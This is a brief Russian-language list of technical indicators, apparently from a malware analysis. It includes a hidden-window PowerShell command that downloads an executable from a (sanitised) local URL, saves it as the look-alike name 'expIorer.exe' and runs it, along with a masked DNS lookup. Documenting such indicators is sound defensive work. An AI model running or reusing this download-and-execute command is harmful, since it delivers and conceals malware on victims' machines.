Техническая информация
- http://127.0.0.1/putty.exe как expiorer.exe
- 'localhost':80
- DNS ASK jq###yapi.info
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-OBJECT System.Net.WebClient).DownloadFile('http://127.0.0.1/putty.exe','expIorer.exe');(New-OBJECT -com Shell.Application).ShellExecute('expIorer.exe');' (со скрытым окном)